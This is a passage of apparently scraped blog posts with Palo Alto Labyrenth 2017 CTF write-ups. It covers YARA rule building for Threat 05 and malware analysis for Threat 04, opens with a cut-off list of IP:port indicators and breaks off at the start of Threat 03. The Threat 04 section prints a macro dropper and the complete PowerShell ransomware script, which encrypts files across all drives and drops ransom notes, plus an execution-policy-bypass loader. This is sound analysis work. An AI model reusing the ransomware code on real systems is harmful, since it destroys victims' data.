<i>77.244.245.37:7080</i></div>
<i>
</i><br />
<div class="MsoNormal">
<i>192.81.212.79:443</i></div>
<i>
</i><br />
<div class="MsoNormal">
<i>173.212.192.45:8080</i></div>
<i>
</i><br />
<div class="MsoNormal">
<i>103.16.131.20:8080 </i></div>
<i>
</i><br />
<br />Mr. Joneshttp://www.blogger.com/profile/15346255825408058734noreply@blogger.com0tag:blogger.com,1999:blog-761861405376292116.post-68465299475061278552017-07-24T21:23:00.005+02:002017-07-24T21:25:39.835+02:00Palo Alto Labyrenth Threat 05 Writeup<h2>
Labyrenth 2017 Threat 05</h2>
For the final challenge of the threat track we are confronted with almost the same task as in threat 2. The difference this time is that we have a set of 36 files and have to find 2 rules to match all files, one should match 34 the other one the remaining 2 files. The worst part about this challenge was a typo from the challenge author ???? which I'm certain put many people on a goose hunt.<br />
<br />
<blockquote class="tr_bq">
Hints:<br />
There are 6 wildcard "?"'s within one rule.<br />
There are 158 wildcard "?"'s within the other rule.<br />
<br />
There will be samples that have both anchor functions.<br />
<br />
One anchor function must cover 34 of the 36 samples <br />
The other must cover 12 of the 36 samples.</blockquote>
I used the same tools/commands I mentioned in my post about threat 2 so I won't mention them here again.<br />
I started bindiffing the smallest (<i>4df98c74bdda906fb96368cc8720e3396b9a942c2eba253f068354fb466e4f93</i>) with the largest (<i>e57b24d962c8a90eb5ab98d9594d7ea077609227565beebef04c2af3cb111df5</i>) file hoping that they would both belong to the 34/36 set. I sorted the output by similarity and function name. On the second sub_function I got lucky and got a match for 34/36 files<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjW6LJYJX5MKKgADhOmaSnqsL5QMUNyhYXYsHcbJee2KTIsV9APF8bTtPlJLoOL5eeYsdletmHE8pxeRSMVMh_SV2ljN45lzBX2NMHQahARhaXnQydXYZT96n-eeMKbTti9yotwoI5kcKMK/s1600/threat5-1.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="244" data-original-width="1510" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjW6LJYJX5MKKgADhOmaSnqsL5QMUNyhYXYsHcbJee2KTIsV9APF8bTtPlJLoOL5eeYsdletmHE8pxeRSMVMh_SV2ljN45lzBX2NMHQahARhaXnQydXYZT96n-eeMKbTti9yotwoI5kcKMK/s1600/threat5-1.JPG" /></a></div>
I used the following command followed by the yara.py from threat 2<br />
<blockquote class="tr_bq">
for i in *; do xxd -p $i | tr -d '\n' | grep -o 8bff558bec83ec14535657e8.* >> ~/hex_values.txt; done</blockquote>
to get the first rule<br />
<blockquote class="tr_bq">
<span style="font-size: x-small;">8bff558bec83ec14535657e8????ffff8365fc00833d??????00008bd80f858e00000068????4?00ff15??????008bf885ff0f842a0100008b35??????0068????4?0057ffd685c00f841401000050e8????ffffc70424????4?0057a3??????00ffd650e8????ffffc70424????4?0057a3??????00ffd650e8????ffffc70424????4?0057a3??????00ffd650e8????ffff59a3??????0085c0741468????4?0057ffd650e8????ffff59a3??????00a1??????003bc3744f391d??????00744750e8????ffffff35??????008bf0e8????ffff59598bf885f6742c85ff7428ffd685c074198d4df8516a0c8d4dec516a0150ffd785c07406f645f4017509814d1000002000eb39a1??????003bc3743050e8????ffff5985c07425ffd08945fc85c0741ca1??????003bc3741350e8????ffff5985c07408ff75fcffd08945fcff35??????00e8????ffff5985c07410ff7510ff750cff7508ff75fcffd0eb0233c05f5e5bc9c3</span></blockquote>
Again matching the complete function.<br />
<br />
For the second rule I immediately started comparing the remaining 2 files, I first bindiffed the smaller (<i>a81057e06bddc2bfdcd0bae8f3ed101a47e926f3d37a7f0f0378a89049725dc7</i>) one with the larger (<i>8b92700bac3150d3456697b64e63d21f8ca4447df57d02c7f90125c3068985d7</i>) and tried every sub_functions without success. I noticed that many of the files have functions in the data section, so I bindiffed the larger of the two files with the smaller one. I found a function which was a sub_function in the larger file and labeled as _fread_nolock_s in the second function and to my surprise it worked<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhvv9kJeMfGOC2WQtTeXl111nG4yTgYsN6BQEPytVY-fOzx0CWCr-aJQhyhsVfjmFm5stlBXD0UcccDhzOmknGHZBA1pbp_7XC7vlAI_EC3OpaTlz_YbdT77vBkLy7M-7atrKhp5Xo5ZNcf/s1600/threat5-2.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="170" data-original-width="1512" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhvv9kJeMfGOC2WQtTeXl111nG4yTgYsN6BQEPytVY-fOzx0CWCr-aJQhyhsVfjmFm5stlBXD0UcccDhzOmknGHZBA1pbp_7XC7vlAI_EC3OpaTlz_YbdT77vBkLy7M-7atrKhp5Xo5ZNcf/s1600/threat5-2.JPG" /></a></div>
<br />
<br />
For the second rule I used <br />
<blockquote class="tr_bq">
for i in *; do xxd -p $i | tr -d '\n' | grep -o 7807c745f001000000.* >> ~/hex_values.txt; done</blockquote>
which matches 4 out of 36 files....., so I guess the the author of the challenge made a mistake and the hint was meant to be<br />
<blockquote class="tr_bq">
The other must cover 2(4???) of the 36 samples.</blockquote>
<br />
to get the second rule<br />
<blockquote class="tr_bq">
<span style="font-size: x-small;">7807c745f001000000a8407412814df000000004814df400000100834dec04a9001000007403097df0a8207409814df000000008eb0ba8107407814df000000010e8????000083cbff89063bc37521e8??</span></blockquote>
using netcat to submit our flag we get the final flag for the threat track<br />
<blockquote class="tr_bq">
rule yara_challenge<br />
{<br />
strings:<br />
$yara_challenge01 = { <span style="font-size: x-small;">8bff558bec83ec14535657e8????ffff8365fc00833d??????00008bd80f858e00000068????4?00ff15??????008bf885ff0f842a0100008b35??????0068????4?0057ffd685c00f841401000050e8????ffffc70424????4?0057a3??????00ffd650e8????ffffc70424????4?0057a3??????00ffd650e8????ffffc70424????4?0057a3??????00ffd650e8????ffff59a3??????0085c0741468????4?0057ffd650e8????ffff59a3??????00a1??????003bc3744f391d??????00744750e8????ffffff35??????008bf0e8????ffff59598bf885f6742c85ff7428ffd685c074198d4df8516a0c8d4dec516a0150ffd785c07406f645f4017509814d1000002000eb39a1??????003bc3743050e8????ffff5985c07425ffd08945fc85c0741ca1??????003bc3741350e8????ffff5985c07408ff75fcffd08945fcff35??????00e8????ffff5985c07410ff7510ff750cff7508ff75fcffd0eb0233c05f5e5bc9c3 </span>}<br />
$yara_challenge02 = { <span style="font-size: x-small;">7807c745f001000000a8407412814df000000004814df400000100834dec04a9001000007403097df0a8207409814df000000008eb0ba8107407814df000000010e8????000083cbff89063bc37521e8??</span> }<br />
condition:<br />
1 of them <br />
}</blockquote>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgv40WPpTjT7xvBsxtJGpMHfEDa36lyVtFyNae663z5aSmgjgvgfFN0oAYfr93NMUhZ30Z-nPhminhSvJ6Sk0ix0qeXmK_5-B7Wjs3VipOgeH1YH3sAtxQfaPe_wFgO-UQMMBD8__6f6KrN/s1600/threat5-final.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="324" data-original-width="719" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgv40WPpTjT7xvBsxtJGpMHfEDa36lyVtFyNae663z5aSmgjgvgfFN0oAYfr93NMUhZ30Z-nPhminhSvJ6Sk0ix0qeXmK_5-B7Wjs3VipOgeH1YH3sAtxQfaPe_wFgO-UQMMBD8__6f6KrN/s1600/threat5-final.JPG" /></a></div>
<br />
<blockquote class="tr_bq">
<b>PAN{Pivot!Pivot!Pivot!Pivot!Pivot!Pivot!ShutUp!ShutUp!ShutUp!}</b></blockquote>
Mr. Joneshttp://www.blogger.com/profile/15346255825408058734noreply@blogger.com0tag:blogger.com,1999:blog-761861405376292116.post-59921302810540767992017-07-24T19:16:00.002+02:002017-07-24T19:16:47.952+02:00Palo Alto Labyrenth Threat 04 Writeup<h2>
<b>Labyrenth 2017 Threat 04</b></h2>
<h4>
Part 1</h4>
We are presented with a document, upon opening the file we see a warning<br /><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZd79k6HJ78UEoFcQ6iwKJU2pSBGio7Yz9c1wkS780ZW6WatvBhQrR9XVutqw_uUBrjR_V5vhqbonOKJ9fURetZVunRX7_BXZWTToo0ZsdIITQx021t2IWIn8kD8OYhbKfl8THj71Y2Gpp/s1600/threat4-1.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="646" data-original-width="813" height="317" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZd79k6HJ78UEoFcQ6iwKJU2pSBGio7Yz9c1wkS780ZW6WatvBhQrR9XVutqw_uUBrjR_V5vhqbonOKJ9fURetZVunRX7_BXZWTToo0ZsdIITQx021t2IWIn8kD8OYhbKfl8THj71Y2Gpp/s400/threat4-1.JPG" width="400" /></a></div>
So let's activate the macros and see what happens.<br /><br /><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQioNwznWhcX59bvskZksa5XoSlXAjfPbhpttbTGaUm0qPq0_8GoH0wm5N93A6hvFgy7CnLJOLXBvsd07vw9DOrR-ZYapa8vTw42JI1CrTyKhcNt4of24-UByh3IwuWNTnM094MjEUgg_7/s1600/threat4-6.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="233" data-original-width="698" height="211" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQioNwznWhcX59bvskZksa5XoSlXAjfPbhpttbTGaUm0qPq0_8GoH0wm5N93A6hvFgy7CnLJOLXBvsd07vw9DOrR-ZYapa8vTw42JI1CrTyKhcNt4of24-UByh3IwuWNTnM094MjEUgg_7/s640/threat4-6.JPG" width="640" /></a></div>
Having a look at the vba macro editor we can see that the document isn't password protected and contains a document open function.<br />
<blockquote class="tr_bq">
Private Sub Document_Open()<br />If ActiveDocument.Variables("ygsbFH").Value <> "goblinkingbb" Then<br />vsMaqqxEhbNVPMi<br />ActiveDocument.Variables("ygsbFH").Value = "goblinkingbb"<br />If ActiveDocument.ReadOnly = False Then<br />ActiveDocument.Save<br />End If<br />End If<br />End Sub</blockquote>
The function basically makes sure that you can only run the file once, afterwards the document variable <i>ygsbFH</i> is overwritten. Having a look at the<i> vsMaqqxEhbNVPMi</i> function we will see that the aforementioned variable is important/required for the decryption mechanism.<br />
<br />
We have multiple ways to continue, the easiest is to just remove the code that overwrites the important document variable so we are able to run the code multiple times. Doing that and saving the file as .docm allows us to run it over and over again<br />
<br />
<blockquote class="tr_bq">
Private Sub Document_Open()<br />If ActiveDocument.Variables("ygsbFH").Value <> "goblinkingbb" Then<br />vsMaqqxEhbNVPMi<br />End If<br />End Sub</blockquote>
I tried debugging the <i>vsMaqqxEhbNVPMi</i> function<i> </i>this way but failed to enter the function as Microsoft Word kept crashing. So I went back to my fallback mode and tried extracting the macros using oletools (<a href="https://github.com/decalage2/oletools">https://github.com/decalage2/oletools)</a> and copying them into a new .docm file. <br />To dump the macros from bbransom.doc, I placed the file in the ole folder and used<br />
<blockquote class="tr_bq">
python olevba.py bbransom.doc > macros.txt</blockquote>
I mentioned before that the <i>ygsbFH </i>is important, so I dumped the variable from the original file and reloaded it in my own .docm. A code reference for write/read operation in vba is <a href="http://codevba.com/office/read_text_file_into_string_variable.htm">http://codevba.com/office/read_text_file_into_string_variable.htm</a>. I added the following code to the Document_Open() function to dump the variable to var.txt<br /><br />
<blockquote class="tr_bq">
Dim myFile As String<br />myFile = "var.txt"<br />Open myFile For Output As #1<br />Write #1, ActiveDocument.Variables("ygsbFH").Value<br />Close #1</blockquote>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
I removed the " and newline from the var.txt and saved it on my Desktop.<br /><br />I created a new document and pasted the extracted macros from oletools into it. I noticed that the private function is the decoding function and references the <i>ygsbFH </i>variable. I replaced the original function with a modified one that loads the variable from file.<br /><br />
<blockquote class="tr_bq">
Private Function cuJgIWtkPd(dytGKUVpoS As Variant, QVuOQXtBcV As Integer)<br />Dim myFile As String<br />myFile = "C:\Users\jones\Desktop\var.txt"<br />Dim iFile As Integer: iFile = FreeFile<br />Open myFile For Input As #iFile<br />ygsbFH = Input(LOF(iFile), iFile)<br />Close #iFile<br />Dim TOJDOAXFXr, eXrxcIdKmp As String, cAJHqnrFBj, QnGcAinJcu<br />eXrxcIdKmp = ygsbFH<br />TOJDOAXFXr = ""<br />cAJHqnrFBj = 1<br />While cAJHqnrFBj < UBound(dytGKUVpoS) + 2<br />QnGcAinJcu = cAJHqnrFBj Mod Len(eXrxcIdKmp): If QnGcAinJcu = 0 Then QnGcAinJcu = Len(eXrxcIdKmp)<br />TOJDOAXFXr = TOJDOAXFXr + Chr(Asc(Mid(eXrxcIdKmp, QnGcAinJcu + QVuOQXtBcV, 1)) Xor CInt(dytGKUVpoS(cAJHqnrFBj - 1)))<br />cAJHqnrFBj = cAJHqnrFBj + 1<br />Wend<br />cuJgIWtkPd = TOJDOAXFXr<br />End Function</blockquote>
Next I had a look at the extracted macros. One can see the MsgBox we saw running the original file.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjLC15aPl0ElWF-9i-z9YPDapRlgtpHEkfom4Ex6qd87sK1Jm72OsDpDsEogddcT0fvyfSr6_GGO8IV0yGkjErby8y3MfJvpwBhnMfhZbJJLTitwZPLWAUw4FRkwbR1FI06cdHrlv2xG03z/s1600/threat4-4.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="322" data-original-width="1071" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjLC15aPl0ElWF-9i-z9YPDapRlgtpHEkfom4Ex6qd87sK1Jm72OsDpDsEogddcT0fvyfSr6_GGO8IV0yGkjErby8y3MfJvpwBhnMfhZbJJLTitwZPLWAUw4FRkwbR1FI06cdHrlv2xG03z/s1600/threat4-4.JPG" /></a></div>
<br />
<br />
The next line is about creating a textfile which looks promising letting the decoding function do it's work we get the filepath <i>C:\Users\public\panlaby.ps1</i><br />
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<br />
<br />
The next instructions are all about decoding strings and writing them to the textfile, so I ran the script to a.Close and made a backup of the file by opening Windows Explorer and copying the file to desktop. <br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitF79No07b1i1QJVk2PrQnxjPICiOe6xphZ3uZX2T22hKvO1H2nGFq0FqrEFX5V-BvdyT3h0n9V0TOdeQ7AvRQnBtgyofGghVZImuf_t8_LVCU_tebRzc_fAr-Hg86FmhTcaoqHfQAId_g/s1600/threat4-5.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="302" data-original-width="1019" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitF79No07b1i1QJVk2PrQnxjPICiOe6xphZ3uZX2T22hKvO1H2nGFq0FqrEFX5V-BvdyT3h0n9V0TOdeQ7AvRQnBtgyofGghVZImuf_t8_LVCU_tebRzc_fAr-Hg86FmhTcaoqHfQAId_g/s1600/threat4-5.JPG" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
The last lines of the macro function create a new WScript.Shell object and run the file. I once again let the decoding function do it's work and extracted the command line options.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgtronxua3JxovdBrRq9IEzf00nG23S7Irk_iwQx9hRzZUc-SAAgyPxcpbCozdOcVhnYgBEbE_pOTuV7YZ5X-yUYUy6F1cyPq-NsnfwqVDBxTDoFdmB0uj76BYoON_aNAr3OyLCgrgmUTIl/s1600/threat4-3.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="45" data-original-width="403" height="35" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgtronxua3JxovdBrRq9IEzf00nG23S7Irk_iwQx9hRzZUc-SAAgyPxcpbCozdOcVhnYgBEbE_pOTuV7YZ5X-yUYUy6F1cyPq-NsnfwqVDBxTDoFdmB0uj76BYoON_aNAr3OyLCgrgmUTIl/s320/threat4-3.JPG" width="320" /></a></div>
The second parameter is <i>C:\Users\public\panlaby.ps1</i><br />
That's it for the first part of the challenge.<br />
<br />
<h4>
Part 2</h4>
The next part of the challenge is about understanding the extracted panlaby.ps1. For your reference this is the original file<br />
<br />
<blockquote class="tr_bq">
$I1lII11ll1I = [System.Text.Encoding]::UTF8<br />$III111lllI1 = "DwImSAI1CgMYSQQ+GhoO"<br />$111IlIIIlll = $I1lII11ll1I.GetBytes("For great justice")<br />$III111lllI1 = $I1lII11ll1I.GetString([System.Convert]::FromBase64String($III111lllI1))<br />$lllII111lIl = $I1lII11ll1I.GetBytes($III111lllI1)<br />$183846385837478 = $(for ($i = 0; $i -lt $lllII111lIl.length; ) {<br />for ($j = 0; $j -lt $111IlIIIlll.length; $j++) {<br />$lllII111lIl[$i] -bxor $111IlIIIlll[$j]<br />$i++<br />if ($i -ge $lllII111lIl.Length) {<br />$j = $111IlIIIlll.length<br />}<br />}<br />})<br />$183846385837478 = $I1lII11ll1I.GetString($183846385837478)<br />$87462387472378 = "OjsjcvRgahjsHbsbbcghhdUjjcRtgWhscJhsdUjsbndRgj"<br />$4874585896348756 = ([Char[]](GeT-RaNdom -Input $(48..57 + 65..90 + 97..122) -Count 24)) -join ""<br />[byte[]]$462873463874364=[system.Text.Encoding]::Unicode.GetBytes($183846385837478)<br />$CFFGCHFFDSEUHGGCFT = [Text.Encoding]::UTF8.GetBytes($87462387472378)<br />$gYGXCbbdcRgsbfIuahs = neW-Object System.Security.Cryptography.RijndaelManaged<br />$gYGXCbbdcRgsbfIuahs.Key = (new-Object Security.Cryptography.Rfc2898DeriveBytes $183846385837478, $CFFGCHFFDSEUHGGCFT, 5).GetBytes(32)<br />$gYGXCbbdcRgsbfIuahs.IV = (new-Object Security.Cryptography.SHA1Managed).ComputeHash([Text.Encoding]::UTF8.GetBytes("alle") )[0..15]<br />$gYGXCbbdcRgsbfIuahs.Padding="Zeros"<br />$gYGXCbbdcRgsbfIuahs.Mode="CBC"<br />$RgxnnHgxghRThajcUJJ= gdr|where {$_.Free}|Sort-ObjeCt -Descending<br />foreach($TgbcRThahjdRRGHjj in $RgxnnHgxghRThajcUJJ){<br />gci $TgbcRThahjdRRGHjj.root -Recurse -Include "*.urbb","*.toby"|%{<br />try{<br />$ChhxnRJhhsncGHH = New-Object System.IO.BinaryReader([System.IO.File]::Open($_, [System.IO.FileMode]::Open, [System.IO.FileAccess]::ReadWrite, [System.IO.FileShare]::Read),[System.Text.Encoding]::ASCII)<br />if ($ChhxnRJhhsncGHH.BaseStream.Length -lt 2048){return}<br />else<br />{<br />$gjYujsjdRThsncGHja = 2048<br />}<br />$462873463874364 = $ChhxnRJhhsncGHH.ReadBytes($gjYujsjdRThsncGHja)<br />$ChhxnRJhhsncGHH.Close()<br />$JkkxTYajncGRahjdjHJ = $gYGXCbbdcRgsbfIuahs.CreateEncryptor()<br />$oUUixjHHhjjxRTHNJ = new-Object IO.MemoryStream<br />$HhxjhTTYhajdJJJasO = new-Object Security.Cryptography.CryptoStream $oUUixjHHhjjxRTHNJ,$JkkxTYajncGRahjdjHJ,"Write"<br />$HhxjhTTYhajdJJJasO.Write($462873463874364, 0,$462873463874364.Length)<br />$HhxjhTTYhajdJJJasO.Close()<br />$oUUixjHHhjjxRTHNJ.Close()<br />$JkkxTYajncGRahjdjHJ.Clear()<br />$Bnx587Fhsjc7ijF4 = $oUUixjHHhjjxRTHNJ.ToArray()<br />$HhjxcRTahjdUYUIN = New-Object System.IO.BinaryWriter([System.IO.File]::Open($_, [System.IO.FileMode]::Open, [System.IO.FileAccess]::ReadWrite, [System.IO.FileShare]::Read),[System.Text.Encoding]::ASCII)<br />$HhjxcRTahjdUYUIN.Write($Bnx587Fhsjc7ijF4,0,$Bnx587Fhsjc7ijF4.Length)<br />$HhjxcRTahjdUYUIN.Close()<br />$GFfstdtHjsjRhgjs=$_.Name+'.bbmine'<br />ren -Path $_.FullName -NewName $GFfstdtHjsjRhgjs -Force<br />$uUhxjhcTYhajWRahhd = $_.Directory.ToString() + '\_HELP_instructions.html'<br />$YuxjncRgahdjjcTYHJ = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("PGgxPkkgYW0gdGhlIGdvYmxpbiBraW5nITwvaDE+PGJyPkFsbCB1ciBiYnogIGFyZSBiZWxvbmcgdG8gdXMuIFlvdSBoYXZlIG5vIGNoYW5jZSB0byBzdXJ2aXZlIG1ha2UgeW91ciB0aW1lLg=="));<br />New-Item -Path $uUhxjhcTYhajWRahhd -ItemType file -Value $YuxjncRgahdjjcTYHJ<br />Add-Content -Path $uUhxjhcTYhajWRahhd -Value ("<h1>CLIENT ID: $4874585896348756 <br></h1>")<br />Add-Content -Path $uUhxjhcTYhajWRahhd -Value ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("PGgyPkNhbXBhaWduIElEOiBGaTQ4VzFVVEF3TVNRVmtRUmsxYVZBQi9EVVFSVnhRQkJ4ZEdDQmNTRUZ0VUIzUlhFRUpYRkZ4UlRFUmJRaGRIV2dWY2RncEtRMThUQVZSREV3dE5Ga1JmVndNNyA8YnI+PC9oMj4=")));<br />Add-Content -Path $uUhxjhcTYhajWRahhd -Value ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("PGgzPlZlcnNpb24gS2V5OiBGb3IgZ3JlYXQganVzdGljZSA8YnI+PC9oMz4=")));<br />}<br />catch<br />{<br />}<br />}}<br />function YHBFDXGFGHGJHDRSD() {<br />$fhYThncwwIjfDFGHsf = (Get-VaRiable MyInvocation -Scope 1).Value<br />$YHnbbfgcgfcEThhYH = $fhYThncwwIjfDFGHsf.MyCommand.Path<br />Remove-ITem $YHnbbfgcgfcEThhYH<br />}<br />YHBFDXGFGHGJHDRSD<br /></blockquote>
There are a few words sticking out immediately, Security.Cryptography function calls and _HELP_instructions.html. This looks like a powershell ransomware. Having further looks at the script one can also see two strings that look like file extensions. .urbb and .toby.<br />To get a better understanding of the code I started renaming variables and removed the last few lines that were responsible for deleting the file.<br /><br />I ran the file by creating a cmd I called loader.cmd<br /><br />
<blockquote class="tr_bq">
powershell.exe -NoP -sta -NonI -ep bypass "C:\Users\jones\Desktop\panlaby.ps1"<br />pause</blockquote>
<br />
<br />
Running the file confirmed my suspicion about the ransomware<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLm-xSSlFppEWViEN5BWbo0_HbL-DU8SMpFxRtW6jwmCE1pWanztX85sWQJbBdBU0_pRD0MFgWFuriDwud-iYNyjAmVxkfXj4ehTqGdzH6yPL5VS1Oeic7RYayx16xh4WA4kSV-ETugH4I/s1600/threat4-7.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="284" data-original-width="643" height="280" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLm-xSSlFppEWViEN5BWbo0_HbL-DU8SMpFxRtW6jwmCE1pWanztX85sWQJbBdBU0_pRD0MFgWFuriDwud-iYNyjAmVxkfXj4ehTqGdzH6yPL5VS1Oeic7RYayx16xh4WA4kSV-ETugH4I/s640/threat4-7.JPG" width="640" /></a></div>
<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
I noticed that it tries to read 2048 of a given file and if it fails stops, so I created a .toby file on my desktop with more than 2048 bytes and run the loader.cmd once again. The script found the file, encrupted the first 2048 bytes, changed the extension and created a _HELP_instructions.html on my desktop.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-Mi9Xkmz6GBVmeRGmpN9rAvFIKJlYnv3VVfLIhTXEyz1EzdBYIdgL1Y0kNRwN62n2Gvx0Vy2dUrvs3OsBTMuMnKlN8Gh1MeJKxniP8JhtN-qFeigXuo8Tp7mghR1Nj1t_wB0nfoDlcrYw/s1600/threat4-8.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="183" data-original-width="124" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-Mi9Xkmz6GBVmeRGmpN9rAvFIKJlYnv3VVfLIhTXEyz1EzdBYIdgL1Y0kNRwN62n2Gvx0Vy2dUrvs3OsBTMuMnKlN8Gh1MeJKxniP8JhtN-qFeigXuo8Tp7mghR1Nj1t_wB0nfoDlcrYw/s1600/threat4-8.JPG" /></a></div>
Opening the instruction file we get<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjLvu7eZPEaPQ_d0UXpnIW1WgO7bpTrlIbjmRhoWcukLp-YbvIkQ1BWZUkoPmvNk3Muy9_5d5li-58US2iePr5d-AS1YSvcFqBij5SrmiDL4Z_2Hd9swfwv0Y1hcyjpqvC9ZNSFq5h34P_I/s1600/threat4-9.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="292" data-original-width="1435" height="130" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjLvu7eZPEaPQ_d0UXpnIW1WgO7bpTrlIbjmRhoWcukLp-YbvIkQ1BWZUkoPmvNk3Muy9_5d5li-58US2iePr5d-AS1YSvcFqBij5SrmiDL4Z_2Hd9swfwv0Y1hcyjpqvC9ZNSFq5h34P_I/s640/threat4-9.JPG" width="640" /></a></div>
<br />
The next step is to figure out how/where these values are created.<br />For the Client ID we find a get-random<br />
<blockquote class="tr_bq">
$4874585896348756 = ([Char[]](GeT-RaNdom -Input $(48..57 + 65..90 + 97..122) -Count 24)) -join ""</blockquote>
The campaign ID and Version Key are static, to retrieve them I pasted the following lines into a powershell window<br /><br />
<blockquote class="tr_bq">
([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("PGgyPkNhbXBhaWduIElEOiBGaTQ4VzFVVEF3TVNRVmtRUmsxYVZBQi9EVVFSVnhRQkJ4ZEdDQmNTRUZ0VUIzUlhFRUpYRkZ4UlRFUmJRaGRIV2dWY2RncEtRMThUQVZSREV3dE5Ga1JmVndNNyA8YnI+PC9oMj4=")))<br />([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("PGgzPlZlcnNpb24gS2V5OiBGb3IgZ3JlYXQganVzdGljZSA8YnI+PC9oMz4=")))</blockquote>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjD0dD0gq_mbKIrhB6vT0XKrNxF3BHcx-wooJ5KDHtFeXhX098Cjoy2B0D7E3Xy3_FrUonk9KEikJFZOhwmpbLtBc1-0-nBvRf2Fxewob5HlExHnah6JGEBHjkhCoUHE4Y8keGZpVyJea37/s1600/threat4-10.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="86" data-original-width="962" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjD0dD0gq_mbKIrhB6vT0XKrNxF3BHcx-wooJ5KDHtFeXhX098Cjoy2B0D7E3Xy3_FrUonk9KEikJFZOhwmpbLtBc1-0-nBvRf2Fxewob5HlExHnah6JGEBHjkhCoUHE4Y8keGZpVyJea37/s1600/threat4-10.JPG" /></a></div>
<br />
So whatever file we are encoding, the Client ID will always be a random value, whereas Campaign ID and Version Key will always be the same. I had a further look at the powershell script and realized there is nothing more to to with it. So I kept thinking about what to do with the given values.<br /><br />
<h4>
Part 3</h4>
The final part was about extracting the flag from the given values. By trial and error I base64 decoded the Campaign ID and xored the result with the key "For great justice" using the following python script<br /><br />
<blockquote class="tr_bq">
<br />import base64<br />target = 'Fi48W1UTAwMSQVkQRk1aVAB/DUQRVxQBBxdGCBcSEFtUB3RXEEJXFFxRTERbQhdHWgVcdgpKQ18TAVRDEwtNFkRfVwM7'<br />xor_key = 'For great justice'<br />res = ''<br />target = base64.b64decode(target)<br />for i in range(0,len(target)):<br /> res+= chr(ord(target[i])^ord(xor_key[i%len(xor_key)]))<br />print res</blockquote>
The output of the script is our flag for threat 4<br />
<blockquote class="tr_bq">
<b>PAN{2afbfa3e5937e9b610fdfcfbbad27b28bb0f908d17d33f90e8c8ad573a8e064f}</b></blockquote>
Mr. Joneshttp://www.blogger.com/profile/15346255825408058734noreply@blogger.com0tag:blogger.com,1999:blog-761861405376292116.post-86527525042272886222017-07-24T16:54:00.002+02:002017-07-24T17:02:16.066+02:00Palo Alto Labyrenth Threat 03 Writeup<h2>
Labyrenth 2017 Threat 03</h2>
Threat 03 is different from all other challenges (except random 6) as it presents us with a website instead of a download <a href="http://youwontfind.me/">http://youwontfind.me/</a><br />
<br />
First step I took was to visit the website<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
